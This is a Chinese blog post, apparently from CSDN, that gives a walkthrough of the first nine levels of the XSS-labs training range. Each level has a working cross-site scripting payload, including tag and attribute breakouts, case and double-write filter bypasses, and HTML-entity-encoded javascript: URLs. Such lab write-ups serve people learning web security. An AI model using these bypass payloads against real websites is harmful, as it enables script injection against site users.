[XSS-labs] 前九关

最新推荐文章于 2024-10-20 15:20:03 发布
最新推荐文章于 2024-10-20 15:20:03 发布
阅读量369 收藏 3
点赞数 3
分类专栏: 靶场 文章标签: 经验分享 笔记 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33171856/article/details/141755288
版权


文章目录

level-1

在这里插入图片描述

直接插入js弹窗语句就好了

?name=<script>alert(1)</script>

在这里插入图片描述

level-2

在这里插入图片描述
当在输入框中插入恶意脚本,会被当成字符串,所以我们要想办法将这个输入标签闭合上,让我们输入的脚本暴露在外面

"><script>alert(1)</script>

输入后会变成这样,将我们的脚本暴露在外面

level-3

使用上一关的payload,不行,会将我们的特殊字符转义
在这里插入图片描述
我们可以试一下onclick事件

'onclick='alert(1)

在这里插入图片描述

这样当我们点击输入框时,就会弹窗
在这里插入图片描述

level-4

用上次的payload发现,这一次改成了双引号闭合,将之前的单引号改成双引号,就好了

level-5

用上一关的payload发现在on中间插入下划线
在这里插入图片描述
我们尝试换一种paylaod

"><a href=javascript:alert(1)>111</a>

旁边会多一个标签
点击即可出发脚本
在这里插入图片描述
在这里插入图片描述

level-6

使用上一个payload发现不可以
我们这次可以尝试大小写绕过

"Onclick="alert(1)

再点击输入框后即可触发payload
在这里插入图片描述

level-7

我们使用上一个payload发现不行
这次我们尝试双写payload

"oonnclick="alert(1)

成功触发payload
在这里插入图片描述

level-8

这一关我们用上一关的payload不行
这一次我们用Unicode编码绕过去
我们将javascript:alert(1)编码后执行

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

在这里插入图片描述

level-9

这一关我们用上一关的payload不行
这次我们将后面的http://注释掉

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://

在这里插入图片描述

JustForAPlayWhile
关注
专栏目录
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs靶场全
m0_64849639的博客
09-04 1048
alert('111')</script><script>
xss-labs1-10
weixin_71398630的博客
04-07 695
第一:html部分标签可以解析js第二:可以看到value用双引号闭合了,使用上一的payload没用,尝试一下闭合这个input所以使用双引号和>闭合后再加入上一的payload第三:通过查看源码发现是使用了单引号闭合再使用上一payload发现它在输入get时使用了.htmlspecialchars(HTML实体编码)这个函数是PHP中的一个编码函数,用于将字符串中的特殊字符转换为对应的HTML实体。它通常用于确保字符串在HTML页面中显示时不会出现意外的效果。
xss-labs靶场1-5
zyh1588的博客
11-21 434
小白回顾xss靶场1-5
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5770
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
【网络安全 --- xss-labs靶场通(11-20)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-23 2094
【网络安全 --- xss-labs靶场通(11-20)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS靶场闯(xss-labs)
小郑的博客
04-22 2107
对数据进行了是否含有http://做了判断,并对键字做了替换,把数据加到了a标签的href属性中,在属性中的数据可以考虑编码,并利用js的注释符//注释掉http://当页面上有两个输出地方,一个输出到了h2标签,后台进行了实体编码,另一个输出到input标签的value属性,没有进行html实体编码,考虑闭合input标签。对on,script进行了替换,将数据加到了input标签的value属性中,没有进行实体编码处理,可以考虑a标签的href属性,可以直接写伪协议。
XSS-labs 通实录
yingu9267的博客
05-02 810
XSS攻击与sql注入逻辑相似,找到注入点,插入恶意代码,过滤绕过……1。
xss-labs-master通教程
qq_73792226的博客
09-07 962
abc
XSS-labs详解
ytdd66的博客
03-23 2717
进入靶场点击图片,开始我们的XSS之旅!
XSS-Labs靶场“6-10”教程
钟言的博客
03-06 7748
本篇为XSS-Labs靶场的第6-10教程,详细内容包含了第六 大小写绕过、第七 双写绕过三、第八 URL编码绕过四、第九 http://判断五、第十 隐藏参数绕过等内容
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
复试经验分享《三、计算机学科专业基础综合》- 数据结构篇
weixin_57165154的博客
10-14 1214
复试经验分享《三、计算机学科专业基础综合》之数据结构,主要介绍了复试时可能会提问到的数据结构的基础知识
王道考研视频——操作系统笔记
最新发布
guojiaqi_的博客
10-20 931
操作系统( Operating System,OS)是指控制和管理整个计算机系统的硬件和软件资源,并合理地组织调度计算机的工作和资源的分配,以提供给用户和其他软件方便的接口和环境的程序集合。
Go Wails 学习笔记:创建第一个项目
程序媛平平无奇的一天
10-14 1168
Wails 通过结合端技术和 Go 后端,提供了一个高效的方式来开发跨平台的桌面应用。其简单的项目初始化和清晰的结构使得开发者能够快速上手。通过 Wails,可以充分利用 Web 开发技能,同时获得原生桌面应用的优势。
贪心算法笔记
qq_45190745的博客
10-15 274
贪心算法笔记
《vue leaflet学习实践笔记
yk_ddm的博客
10-16 235
目录vue leaflet学习实践笔记 vue leaflet学习实践笔记
xss-labs第14
08-18
- *3* [渗透测试之---xss-labs闯【1-14】](https://blog.csdn.net/qq_43168364/article/details/105523753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值